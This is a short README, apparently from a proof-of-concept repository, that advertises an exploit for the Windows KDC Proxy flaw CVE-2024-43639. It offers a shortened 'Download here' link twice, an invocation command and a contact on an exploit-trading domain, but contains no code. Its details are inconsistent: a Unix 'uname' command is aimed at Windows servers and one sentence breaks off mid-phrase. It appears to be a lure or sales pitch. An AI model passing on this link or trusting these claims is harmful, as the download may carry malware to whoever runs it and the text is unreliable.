# CVE-2024-43639 Windows KDC Proxy Remote Code Execution Vulnerability
## Overview
CVE-2024-43639
Authentication system and use of RCE in Windows Server 2012, 2016, 2019, 2022, 2025 ( Server Core included)
## Exploit:
### [Download here](https://bit.ly/48YH7Wb)
## Details
- **CVE ID**: [CVE-2024-43639](https://nvd.nist.gov/vuln/detail/CVE-2024-43639)
- **Published**: 2024-11-12
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: 9.8
## Vulnerability Description
CVE-2024-43639 is a critical vulnerability in the
This vulnerability has been assigned the CVSS 3 score of 9.8/10. The vulnerability allows an unauthenticated attacker to use a specially crafted application to leverage a cryptographic protocol vulnerability in Windows to perform remote code execution against the target. This process does not require any user interaction and there are no workarounds to mitigate this vulnerability.
## Affected Versions
**Windows Server 2012, 2016, 2019, 2022, 2025 ( Server Core included)**
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **exploitsecure@exploit.in**
## Exploit:
### [Download here](https://bit.ly/48YH7Wb)
[4.0K] /data/pocs/95be2c95eb140554ca0da198d82d54c33912bd14
└── [1.3K] README.md
0 directories, 1 file